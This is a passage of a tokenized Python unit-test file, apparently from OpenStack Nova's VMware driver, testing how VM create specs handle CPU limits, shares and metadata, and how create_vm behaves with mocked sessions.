name|'serial_port_spec'
op|']'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'expected'
op|','
name|'result'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_get_vm_create_spec_with_allocations
dedent|''
name|'def'
name|'test_get_vm_create_spec_with_allocations'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'cpu_limits'
op|'='
name|'vm_util'
op|'.'
name|'Limits'
op|'('
name|'limit'
op|'='
number|'7'
op|','
nl|'\n'
name|'reservation'
op|'='
number|'6'
op|')'
newline|'\n'
name|'extra_specs'
op|'='
name|'vm_util'
op|'.'
name|'ExtraSpecs'
op|'('
name|'cpu_limits'
op|'='
name|'cpu_limits'
op|')'
newline|'\n'
name|'fake_factory'
op|'='
name|'fake'
op|'.'
name|'FakeFactory'
op|'('
op|')'
newline|'\n'
name|'result'
op|'='
name|'vm_util'
op|'.'
name|'get_vm_create_spec'
op|'('
name|'fake_factory'
op|','
nl|'\n'
name|'self'
op|'.'
name|'_instance'
op|','
nl|'\n'
string|"'fake-datastore'"
op|','
op|'['
op|']'
op|','
nl|'\n'
name|'extra_specs'
op|')'
newline|'\n'
name|'expected'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:VirtualMachineConfigSpec'"
op|')'
newline|'\n'
name|'expected'
op|'.'
name|'deviceChange'
op|'='
op|'['
op|']'
newline|'\n'
name|'expected'
op|'.'
name|'guestId'
op|'='
name|'constants'
op|'.'
name|'DEFAULT_OS_TYPE'
newline|'\n'
name|'expected'
op|'.'
name|'instanceUuid'
op|'='
name|'self'
op|'.'
name|'_instance'
op|'.'
name|'uuid'
newline|'\n'
name|'expected'
op|'.'
name|'memoryMB'
op|'='
name|'self'
op|'.'
name|'_instance'
op|'.'
name|'memory_mb'
newline|'\n'
name|'expected'
op|'.'
name|'name'
op|'='
name|'self'
op|'.'
name|'_instance'
op|'.'
name|'uuid'
newline|'\n'
name|'expected'
op|'.'
name|'numCPUs'
op|'='
name|'self'
op|'.'
name|'_instance'
op|'.'
name|'vcpus'
newline|'\n'
name|'expected'
op|'.'
name|'version'
op|'='
name|'None'
newline|'\n'
nl|'\n'
name|'expected'
op|'.'
name|'files'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:VirtualMachineFileInfo'"
op|')'
newline|'\n'
name|'expected'
op|'.'
name|'files'
op|'.'
name|'vmPathName'
op|'='
string|"'[fake-datastore]'"
newline|'\n'
nl|'\n'
name|'expected'
op|'.'
name|'tools'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:ToolsConfigInfo'"
op|')'
newline|'\n'
name|'expected'
op|'.'
name|'tools'
op|'.'
name|'afterPowerOn'
op|'='
name|'True'
newline|'\n'
name|'expected'
op|'.'
name|'tools'
op|'.'
name|'afterResume'
op|'='
name|'True'
newline|'\n'
name|'expected'
op|'.'
name|'tools'
op|'.'
name|'beforeGuestReboot'
op|'='
name|'True'
newline|'\n'
name|'expected'
op|'.'
name|'tools'
op|'.'
name|'beforeGuestShutdown'
op|'='
name|'True'
newline|'\n'
name|'expected'
op|'.'
name|'tools'
op|'.'
name|'beforeGuestStandby'
op|'='
name|'True'
newline|'\n'
nl|'\n'
name|'expected'
op|'.'
name|'managedBy'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:ManagedByInfo'"
op|')'
newline|'\n'
name|'expected'
op|'.'
name|'managedBy'
op|'.'
name|'extensionKey'
op|'='
string|"'org.openstack.compute'"
newline|'\n'
name|'expected'
op|'.'
name|'managedBy'
op|'.'
name|'type'
op|'='
string|"'instance'"
newline|'\n'
nl|'\n'
name|'cpu_allocation'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:ResourceAllocationInfo'"
op|')'
newline|'\n'
name|'cpu_allocation'
op|'.'
name|'limit'
op|'='
number|'7'
newline|'\n'
name|'cpu_allocation'
op|'.'
name|'reservation'
op|'='
number|'6'
newline|'\n'
name|'cpu_allocation'
op|'.'
name|'shares'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:SharesInfo'"
op|')'
newline|'\n'
name|'cpu_allocation'
op|'.'
name|'shares'
op|'.'
name|'level'
op|'='
string|"'normal'"
newline|'\n'
name|'cpu_allocation'
op|'.'
name|'shares'
op|'.'
name|'shares'
op|'='
number|'0'
newline|'\n'
name|'expected'
op|'.'
name|'cpuAllocation'
op|'='
name|'cpu_allocation'
newline|'\n'
nl|'\n'
name|'expected'
op|'.'
name|'extraConfig'
op|'='
op|'['
op|']'
newline|'\n'
name|'extra_config'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:OptionValue'"
op|')'
newline|'\n'
name|'extra_config'
op|'.'
name|'key'
op|'='
string|"'nvp.vm-uuid'"
newline|'\n'
name|'extra_config'
op|'.'
name|'value'
op|'='
name|'self'
op|'.'
name|'_instance'
op|'.'
name|'uuid'
newline|'\n'
name|'expected'
op|'.'
name|'extraConfig'
op|'.'
name|'append'
op|'('
name|'extra_config'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'expected'
op|','
name|'result'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_get_vm_create_spec_with_limit
dedent|''
name|'def'
name|'test_get_vm_create_spec_with_limit'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'cpu_limits'
op|'='
name|'vm_util'
op|'.'
name|'Limits'
op|'('
name|'limit'
op|'='
number|'7'
op|')'
newline|'\n'
name|'extra_specs'
op|'='
name|'vm_util'
op|'.'
name|'ExtraSpecs'
op|'('
name|'cpu_limits'
op|'='
name|'cpu_limits'
op|')'
newline|'\n'
name|'fake_factory'
op|'='
name|'fake'
op|'.'
name|'FakeFactory'
op|'('
op|')'
newline|'\n'
name|'result'
op|'='
name|'vm_util'
op|'.'
name|'get_vm_create_spec'
op|'('
name|'fake_factory'
op|','
nl|'\n'
name|'self'
op|'.'
name|'_instance'
op|','
nl|'\n'
string|"'fake-datastore'"
op|','
op|'['
op|']'
op|','
nl|'\n'
name|'extra_specs'
op|')'
newline|'\n'
name|'expected'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:VirtualMachineConfigSpec'"
op|')'
newline|'\n'
name|'expected'
op|'.'
name|'files'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:VirtualMachineFileInfo'"
op|')'
newline|'\n'
name|'expected'
op|'.'
name|'files'
op|'.'
name|'vmPathName'
op|'='
string|"'[fake-datastore]'"
newline|'\n'
name|'expected'
op|'.'
name|'instanceUuid'
op|'='
name|'self'
op|'.'
name|'_instance'
op|'.'
name|'uuid'
newline|'\n'
name|'expected'
op|'.'
name|'name'
op|'='
name|'self'
op|'.'
name|'_instance'
op|'.'
name|'uuid'
newline|'\n'
name|'expected'
op|'.'
name|'deviceChange'
op|'='
op|'['
op|']'
newline|'\n'
name|'expected'
op|'.'
name|'extraConfig'
op|'='
op|'['
op|']'
newline|'\n'
nl|'\n'
name|'extra_config'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|'"ns0:OptionValue"'
op|')'
newline|'\n'
name|'extra_config'
op|'.'
name|'value'
op|'='
name|'self'
op|'.'
name|'_instance'
op|'.'
name|'uuid'
newline|'\n'
name|'extra_config'
op|'.'
name|'key'
op|'='
string|"'nvp.vm-uuid'"
newline|'\n'
name|'expected'
op|'.'
name|'extraConfig'
op|'.'
name|'append'
op|'('
name|'extra_config'
op|')'
newline|'\n'
nl|'\n'
name|'expected'
op|'.'
name|'memoryMB'
op|'='
number|'2048'
newline|'\n'
nl|'\n'
name|'expected'
op|'.'
name|'managedBy'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:ManagedByInfo'"
op|')'
newline|'\n'
name|'expected'
op|'.'
name|'managedBy'
op|'.'
name|'extensionKey'
op|'='
string|"'org.openstack.compute'"
newline|'\n'
name|'expected'
op|'.'
name|'managedBy'
op|'.'
name|'type'
op|'='
string|"'instance'"
newline|'\n'
nl|'\n'
name|'expected'
op|'.'
name|'version'
op|'='
name|'None'
newline|'\n'
name|'expected'
op|'.'
name|'guestId'
op|'='
name|'constants'
op|'.'
name|'DEFAULT_OS_TYPE'
newline|'\n'
nl|'\n'
name|'expected'
op|'.'
name|'tools'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:ToolsConfigInfo'"
op|')'
newline|'\n'
name|'expected'
op|'.'
name|'tools'
op|'.'
name|'afterPowerOn'
op|'='
name|'True'
newline|'\n'
name|'expected'
op|'.'
name|'tools'
op|'.'
name|'afterResume'
op|'='
name|'True'
newline|'\n'
name|'expected'
op|'.'
name|'tools'
op|'.'
name|'beforeGuestReboot'
op|'='
name|'True'
newline|'\n'
name|'expected'
op|'.'
name|'tools'
op|'.'
name|'beforeGuestShutdown'
op|'='
name|'True'
newline|'\n'
name|'expected'
op|'.'
name|'tools'
op|'.'
name|'beforeGuestStandby'
op|'='
name|'True'
newline|'\n'
nl|'\n'
name|'cpu_allocation'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:ResourceAllocationInfo'"
op|')'
newline|'\n'
name|'cpu_allocation'
op|'.'
name|'limit'
op|'='
number|'7'
newline|'\n'
name|'cpu_allocation'
op|'.'
name|'reservation'
op|'='
number|'0'
newline|'\n'
name|'cpu_allocation'
op|'.'
name|'shares'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:SharesInfo'"
op|')'
newline|'\n'
name|'cpu_allocation'
op|'.'
name|'shares'
op|'.'
name|'level'
op|'='
string|"'normal'"
newline|'\n'
name|'cpu_allocation'
op|'.'
name|'shares'
op|'.'
name|'shares'
op|'='
number|'0'
newline|'\n'
name|'expected'
op|'.'
name|'cpuAllocation'
op|'='
name|'cpu_allocation'
newline|'\n'
nl|'\n'
name|'expected'
op|'.'
name|'numCPUs'
op|'='
number|'2'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'expected'
op|','
name|'result'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_get_vm_create_spec_with_share
dedent|''
name|'def'
name|'test_get_vm_create_spec_with_share'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'cpu_limits'
op|'='
name|'vm_util'
op|'.'
name|'Limits'
op|'('
name|'shares_level'
op|'='
string|"'high'"
op|')'
newline|'\n'
name|'extra_specs'
op|'='
name|'vm_util'
op|'.'
name|'ExtraSpecs'
op|'('
name|'cpu_limits'
op|'='
name|'cpu_limits'
op|')'
newline|'\n'
name|'fake_factory'
op|'='
name|'fake'
op|'.'
name|'FakeFactory'
op|'('
op|')'
newline|'\n'
name|'result'
op|'='
name|'vm_util'
op|'.'
name|'get_vm_create_spec'
op|'('
name|'fake_factory'
op|','
nl|'\n'
name|'self'
op|'.'
name|'_instance'
op|','
nl|'\n'
string|"'fake-datastore'"
op|','
op|'['
op|']'
op|','
nl|'\n'
name|'extra_specs'
op|')'
newline|'\n'
name|'expected'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:VirtualMachineConfigSpec'"
op|')'
newline|'\n'
nl|'\n'
name|'expected'
op|'.'
name|'files'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:VirtualMachineFileInfo'"
op|')'
newline|'\n'
name|'expected'
op|'.'
name|'files'
op|'.'
name|'vmPathName'
op|'='
string|"'[fake-datastore]'"
newline|'\n'
nl|'\n'
name|'expected'
op|'.'
name|'instanceUuid'
op|'='
name|'self'
op|'.'
name|'_instance'
op|'.'
name|'uuid'
newline|'\n'
name|'expected'
op|'.'
name|'name'
op|'='
name|'self'
op|'.'
name|'_instance'
op|'.'
name|'uuid'
newline|'\n'
name|'expected'
op|'.'
name|'deviceChange'
op|'='
op|'['
op|']'
newline|'\n'
nl|'\n'
name|'expected'
op|'.'
name|'extraConfig'
op|'='
op|'['
op|']'
newline|'\n'
name|'extra_config'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:OptionValue'"
op|')'
newline|'\n'
name|'extra_config'
op|'.'
name|'value'
op|'='
name|'self'
op|'.'
name|'_instance'
op|'.'
name|'uuid'
newline|'\n'
name|'extra_config'
op|'.'
name|'key'
op|'='
string|"'nvp.vm-uuid'"
newline|'\n'
name|'expected'
op|'.'
name|'extraConfig'
op|'.'
name|'append'
op|'('
name|'extra_config'
op|')'
newline|'\n'
nl|'\n'
name|'expected'
op|'.'
name|'memoryMB'
op|'='
number|'2048'
newline|'\n'
nl|'\n'
name|'expected'
op|'.'
name|'managedBy'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:ManagedByInfo'"
op|')'
newline|'\n'
name|'expected'
op|'.'
name|'managedBy'
op|'.'
name|'type'
op|'='
string|"'instance'"
newline|'\n'
name|'expected'
op|'.'
name|'managedBy'
op|'.'
name|'extensionKey'
op|'='
string|"'org.openstack.compute'"
newline|'\n'
nl|'\n'
name|'expected'
op|'.'
name|'version'
op|'='
name|'None'
newline|'\n'
name|'expected'
op|'.'
name|'guestId'
op|'='
name|'constants'
op|'.'
name|'DEFAULT_OS_TYPE'
newline|'\n'
nl|'\n'
name|'expected'
op|'.'
name|'tools'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:ToolsConfigInfo'"
op|')'
newline|'\n'
name|'expected'
op|'.'
name|'tools'
op|'.'
name|'beforeGuestStandby'
op|'='
name|'True'
newline|'\n'
name|'expected'
op|'.'
name|'tools'
op|'.'
name|'beforeGuestReboot'
op|'='
name|'True'
newline|'\n'
name|'expected'
op|'.'
name|'tools'
op|'.'
name|'beforeGuestShutdown'
op|'='
name|'True'
newline|'\n'
name|'expected'
op|'.'
name|'tools'
op|'.'
name|'afterResume'
op|'='
name|'True'
newline|'\n'
name|'expected'
op|'.'
name|'tools'
op|'.'
name|'afterPowerOn'
op|'='
name|'True'
newline|'\n'
nl|'\n'
name|'cpu_allocation'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:ResourceAllocationInfo'"
op|')'
newline|'\n'
name|'cpu_allocation'
op|'.'
name|'reservation'
op|'='
number|'0'
newline|'\n'
name|'cpu_allocation'
op|'.'
name|'limit'
op|'='
op|'-'
number|'1'
newline|'\n'
name|'cpu_allocation'
op|'.'
name|'shares'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:SharesInfo'"
op|')'
newline|'\n'
name|'cpu_allocation'
op|'.'
name|'shares'
op|'.'
name|'level'
op|'='
string|"'high'"
newline|'\n'
name|'cpu_allocation'
op|'.'
name|'shares'
op|'.'
name|'shares'
op|'='
number|'0'
newline|'\n'
name|'expected'
op|'.'
name|'cpuAllocation'
op|'='
name|'cpu_allocation'
newline|'\n'
name|'expected'
op|'.'
name|'numCPUs'
op|'='
number|'2'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'expected'
op|','
name|'result'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_get_vm_create_spec_with_share_custom
dedent|''
name|'def'
name|'test_get_vm_create_spec_with_share_custom'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'cpu_limits'
op|'='
name|'vm_util'
op|'.'
name|'Limits'
op|'('
name|'shares_level'
op|'='
string|"'custom'"
op|','
nl|'\n'
name|'shares_share'
op|'='
number|'1948'
op|')'
newline|'\n'
name|'extra_specs'
op|'='
name|'vm_util'
op|'.'
name|'ExtraSpecs'
op|'('
name|'cpu_limits'
op|'='
name|'cpu_limits'
op|')'
newline|'\n'
name|'fake_factory'
op|'='
name|'fake'
op|'.'
name|'FakeFactory'
op|'('
op|')'
newline|'\n'
name|'result'
op|'='
name|'vm_util'
op|'.'
name|'get_vm_create_spec'
op|'('
name|'fake_factory'
op|','
nl|'\n'
name|'self'
op|'.'
name|'_instance'
op|','
nl|'\n'
string|"'fake-datastore'"
op|','
op|'['
op|']'
op|','
nl|'\n'
name|'extra_specs'
op|')'
newline|'\n'
name|'expected'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:VirtualMachineConfigSpec'"
op|')'
newline|'\n'
name|'expected'
op|'.'
name|'files'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:VirtualMachineFileInfo'"
op|')'
newline|'\n'
name|'expected'
op|'.'
name|'files'
op|'.'
name|'vmPathName'
op|'='
string|"'[fake-datastore]'"
newline|'\n'
nl|'\n'
name|'expected'
op|'.'
name|'instanceUuid'
op|'='
name|'self'
op|'.'
name|'_instance'
op|'.'
name|'uuid'
newline|'\n'
name|'expected'
op|'.'
name|'name'
op|'='
name|'self'
op|'.'
name|'_instance'
op|'.'
name|'uuid'
newline|'\n'
name|'expected'
op|'.'
name|'deviceChange'
op|'='
op|'['
op|']'
newline|'\n'
nl|'\n'
name|'expected'
op|'.'
name|'extraConfig'
op|'='
op|'['
op|']'
newline|'\n'
name|'extra_config'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:OptionValue'"
op|')'
newline|'\n'
name|'extra_config'
op|'.'
name|'key'
op|'='
string|"'nvp.vm-uuid'"
newline|'\n'
name|'extra_config'
op|'.'
name|'value'
op|'='
name|'self'
op|'.'
name|'_instance'
op|'.'
name|'uuid'
newline|'\n'
name|'expected'
op|'.'
name|'extraConfig'
op|'.'
name|'append'
op|'('
name|'extra_config'
op|')'
newline|'\n'
nl|'\n'
name|'expected'
op|'.'
name|'memoryMB'
op|'='
number|'2048'
newline|'\n'
name|'expected'
op|'.'
name|'managedBy'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:ManagedByInfo'"
op|')'
newline|'\n'
name|'expected'
op|'.'
name|'managedBy'
op|'.'
name|'extensionKey'
op|'='
string|"'org.openstack.compute'"
newline|'\n'
name|'expected'
op|'.'
name|'managedBy'
op|'.'
name|'type'
op|'='
string|"'instance'"
newline|'\n'
nl|'\n'
name|'expected'
op|'.'
name|'version'
op|'='
name|'None'
newline|'\n'
name|'expected'
op|'.'
name|'guestId'
op|'='
name|'constants'
op|'.'
name|'DEFAULT_OS_TYPE'
newline|'\n'
name|'expected'
op|'.'
name|'tools'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:ToolsConfigInfo'"
op|')'
newline|'\n'
name|'expected'
op|'.'
name|'tools'
op|'.'
name|'beforeGuestStandby'
op|'='
name|'True'
newline|'\n'
name|'expected'
op|'.'
name|'tools'
op|'.'
name|'beforeGuestReboot'
op|'='
name|'True'
newline|'\n'
name|'expected'
op|'.'
name|'tools'
op|'.'
name|'beforeGuestShutdown'
op|'='
name|'True'
newline|'\n'
name|'expected'
op|'.'
name|'tools'
op|'.'
name|'afterResume'
op|'='
name|'True'
newline|'\n'
name|'expected'
op|'.'
name|'tools'
op|'.'
name|'afterPowerOn'
op|'='
name|'True'
newline|'\n'
nl|'\n'
name|'cpu_allocation'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:ResourceAllocationInfo'"
op|')'
newline|'\n'
name|'cpu_allocation'
op|'.'
name|'reservation'
op|'='
number|'0'
newline|'\n'
name|'cpu_allocation'
op|'.'
name|'limit'
op|'='
op|'-'
number|'1'
newline|'\n'
name|'cpu_allocation'
op|'.'
name|'shares'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:SharesInfo'"
op|')'
newline|'\n'
name|'cpu_allocation'
op|'.'
name|'shares'
op|'.'
name|'level'
op|'='
string|"'custom'"
newline|'\n'
name|'cpu_allocation'
op|'.'
name|'shares'
op|'.'
name|'shares'
op|'='
number|'1948'
newline|'\n'
name|'expected'
op|'.'
name|'cpuAllocation'
op|'='
name|'cpu_allocation'
newline|'\n'
name|'expected'
op|'.'
name|'numCPUs'
op|'='
number|'2'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'expected'
op|','
name|'result'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_get_vm_create_spec_with_metadata
dedent|''
name|'def'
name|'test_get_vm_create_spec_with_metadata'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'extra_specs'
op|'='
name|'vm_util'
op|'.'
name|'ExtraSpecs'
op|'('
op|')'
newline|'\n'
name|'fake_factory'
op|'='
name|'fake'
op|'.'
name|'FakeFactory'
op|'('
op|')'
newline|'\n'
name|'result'
op|'='
name|'vm_util'
op|'.'
name|'get_vm_create_spec'
op|'('
name|'fake_factory'
op|','
nl|'\n'
name|'self'
op|'.'
name|'_instance'
op|','
nl|'\n'
string|"'fake-datastore'"
op|','
op|'['
op|']'
op|','
nl|'\n'
name|'extra_specs'
op|','
nl|'\n'
name|'metadata'
op|'='
string|"'fake-metadata'"
op|')'
newline|'\n'
nl|'\n'
name|'expected'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:VirtualMachineConfigSpec'"
op|')'
newline|'\n'
name|'expected'
op|'.'
name|'name'
op|'='
name|'self'
op|'.'
name|'_instance'
op|'.'
name|'uuid'
newline|'\n'
name|'expected'
op|'.'
name|'instanceUuid'
op|'='
name|'self'
op|'.'
name|'_instance'
op|'.'
name|'uuid'
newline|'\n'
name|'expected'
op|'.'
name|'deviceChange'
op|'='
op|'['
op|']'
newline|'\n'
name|'expected'
op|'.'
name|'numCPUs'
op|'='
number|'2'
newline|'\n'
nl|'\n'
name|'expected'
op|'.'
name|'version'
op|'='
name|'None'
newline|'\n'
name|'expected'
op|'.'
name|'memoryMB'
op|'='
number|'2048'
newline|'\n'
name|'expected'
op|'.'
name|'guestId'
op|'='
string|"'otherGuest'"
newline|'\n'
name|'expected'
op|'.'
name|'annotation'
op|'='
string|"'fake-metadata'"
newline|'\n'
name|'expected'
op|'.'
name|'extraConfig'
op|'='
op|'['
op|']'
newline|'\n'
nl|'\n'
name|'extra_config'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|'"ns0:OptionValue"'
op|')'
newline|'\n'
name|'extra_config'
op|'.'
name|'value'
op|'='
name|'self'
op|'.'
name|'_instance'
op|'.'
name|'uuid'
newline|'\n'
name|'extra_config'
op|'.'
name|'key'
op|'='
string|"'nvp.vm-uuid'"
newline|'\n'
name|'expected'
op|'.'
name|'extraConfig'
op|'.'
name|'append'
op|'('
name|'extra_config'
op|')'
newline|'\n'
name|'expected'
op|'.'
name|'files'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:VirtualMachineFileInfo'"
op|')'
newline|'\n'
name|'expected'
op|'.'
name|'files'
op|'.'
name|'vmPathName'
op|'='
string|"'[fake-datastore]'"
newline|'\n'
nl|'\n'
name|'expected'
op|'.'
name|'managedBy'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:ManagedByInfo'"
op|')'
newline|'\n'
name|'expected'
op|'.'
name|'managedBy'
op|'.'
name|'extensionKey'
op|'='
string|"'org.openstack.compute'"
newline|'\n'
name|'expected'
op|'.'
name|'managedBy'
op|'.'
name|'type'
op|'='
string|"'instance'"
newline|'\n'
nl|'\n'
name|'expected'
op|'.'
name|'tools'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:ToolsConfigInfo'"
op|')'
newline|'\n'
name|'expected'
op|'.'
name|'tools'
op|'.'
name|'afterPowerOn'
op|'='
name|'True'
newline|'\n'
name|'expected'
op|'.'
name|'tools'
op|'.'
name|'afterResume'
op|'='
name|'True'
newline|'\n'
name|'expected'
op|'.'
name|'tools'
op|'.'
name|'beforeGuestReboot'
op|'='
name|'True'
newline|'\n'
name|'expected'
op|'.'
name|'tools'
op|'.'
name|'beforeGuestShutdown'
op|'='
name|'True'
newline|'\n'
name|'expected'
op|'.'
name|'tools'
op|'.'
name|'beforeGuestStandby'
op|'='
name|'True'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'expected'
op|','
name|'result'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_create_vm
dedent|''
name|'def'
name|'test_create_vm'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
nl|'\n'
DECL|function|fake_call_method
indent|' '
name|'def'
name|'fake_call_method'
op|'('
name|'module'
op|','
name|'method'
op|','
op|'*'
name|'args'
op|','
op|'**'
name|'kwargs'
op|')'
op|':'
newline|'\n'
indent|' '
name|'if'
op|'('
name|'method'
op|'=='
string|"'CreateVM_Task'"
op|')'
op|':'
newline|'\n'
indent|' '
name|'return'
string|"'fake_create_vm_task'"
newline|'\n'
dedent|''
name|'else'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'fail'
op|'('
string|"'Should not get here....'"
op|')'
newline|'\n'
nl|'\n'
DECL|function|fake_wait_for_task
dedent|''
dedent|''
name|'def'
name|'fake_wait_for_task'
op|'('
name|'self'
op|','
op|'*'
name|'args'
op|')'
op|':'
newline|'\n'
indent|' '
name|'task_info'
op|'='
name|'mock'
op|'.'
name|'Mock'
op|'('
name|'state'
op|'='
string|'"success"'
op|','
name|'result'
op|'='
string|'"fake_vm_ref"'
op|')'
newline|'\n'
name|'return'
name|'task_info'
newline|'\n'
nl|'\n'
dedent|''
name|'session'
op|'='
name|'fake'
op|'.'
name|'FakeSession'
op|'('
op|')'
newline|'\n'
name|'fake_call_mock'
op|'='
name|'mock'
op|'.'
name|'Mock'
op|'('
name|'side_effect'
op|'='
name|'fake_call_method'
op|')'
newline|'\n'
name|'fake_wait_mock'
op|'='
name|'mock'
op|'.'
name|'Mock'
op|'('
name|'side_effect'
op|'='
name|'fake_wait_for_task'
op|')'
newline|'\n'
name|'with'
name|'test'
op|'.'
name|'nested'
op|'('
nl|'\n'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'session'
op|','
string|"'_wait_for_task'"
op|','
nl|'\n'
name|'fake_wait_mock'
op|')'
op|','
nl|'\n'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'session'
op|','
string|"'_call_method'"
op|','
nl|'\n'
name|'fake_call_mock'
op|')'
nl|'\n'
op|')'
name|'as'
op|'('
name|'wait_for_task'
op|','
name|'call_method'
op|')'
op|':'
newline|'\n'
indent|' '
name|'vm_ref'
op|'='
name|'vm_util'
op|'.'
name|'create_vm'
op|'('
nl|'\n'
name|'session'
op|','
nl|'\n'
name|'self'
op|'.'
name|'_instance'
op|','
nl|'\n'
string|"'fake_vm_folder'"
op|','
nl|'\n'
string|"'fake_config_spec'"
op|','
nl|'\n'
string|"'fake_res_pool_ref'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
string|"'fake_vm_ref'"
op|','
name|'vm_ref'
op|')'
newline|'\n'
nl|'\n'
name|'call_method'
op|'.'
name|'assert_called_once_with'
op|'('
name|'mock'
op|'.'
name|'ANY'
op|','
string|"'CreateVM_Task'"
op|','
nl|'\n'
string|"'fake_vm_folder'"
op|','
name|'config'
op|'='
string|"'fake_config_spec'"
op|','
nl|'\n'
name|'pool'
op|'='
string|"'fake_res_pool_ref'"
op|')'
newline|'\n'
name|'wait_for_task'
op|'.'
name|'assert_called_once_with'
op|'('
string|"'fake_create_vm_task'"
op|')'
newline|'\n'
nl|'\n'
dedent|''
dedent|''
op|'@'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'vm_util'
op|'.'
name|'LOG'
op|','
string|"'warning'"
op|')'
newline|'\n'
DECL|member|test_create_vm_invalid_guestid
name|'def'
name|'test_create_vm_invalid_guestid'
op|'('
name|'self'
op|','
name|'mock_log_warn'
op|')'
op|':'
newline|'\n'
indent|' '
string|'"""Ensure we warn when create_vm() fails after we passed an\n unrecognised guestId\n """'
newline|'\n'
nl|'\n'
name|'found'
op|'='
op|'['
name|'False'
op|']'
newline|'\n'
nl|'\n'
DECL|function|fake_log_warn
name|'def'
name|'fake_log_warn'
op|'('
name|'msg'
op|','
name|'values'
op|')'
op|':'
newline|'\n'
indent|' '
name|'if'
name|'not'
name|'isinstance'
op|'('
name|'values'
op|','
name|'dict'
op|')'
op|':'
newline|'\n'
indent|' '
name|'return'
newline|'\n'
dedent|''
name|'if'
name|'values'
op|'.'
name|'get'
op|'('
string|"'ostype'"
op|')'
op|'=='
string|"'invalid_os_type'"
op|':'
newline|'\n'
indent|' '
name|'found'
op|'['
number|'0'
op|']'
op|'='
name|'True'
newline|'\n'
dedent|''
dedent|''
name|'mock_log_warn'
op|'.'
name|'side_effect'
op|'='
name|'fake_log_warn'
newline|'\n'
nl|'\n'
name|'session'
op|'='
name|'driver'
op|'.'
name|'VMwareAPISession'
op|'('
op|')'
newline|'\n'
nl|'\n'
name|'config_spec'
op|'='
name|'vm_util'
op|'.'
name|'get_vm_create_spec'
op|'('
nl|'\n'
name|'session'
op|'.'
name|'vim'
op|'.'
name|'client'
op|'.'
name|'factory'
op|','
nl|'\n'
name|'self'
op|'.'
name|'_instance'
op|','
string|"'fake-datastore'"
op|','
op|'['
op|']'
op|','
nl|'\n'
name|'vm_util'
op|'.'
name|'ExtraSpecs'
op|'('
op|')'
op|','
nl|'\n'
name|'os_type'
op|'='
string|"'invalid_os_type'"
op|')'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'assertRaises'
op|'('
name|'vexc'
op|'.'
name|'VMwareDriverException'
op|','
nl|'\n'
name|'vm_util'
op|'.'
name|'create_vm'
op|','
name|'session'
op|','
name|'self'
op|'.'
name|'_instance'
op|','
nl|'\n'
string|"'folder'"
op|','
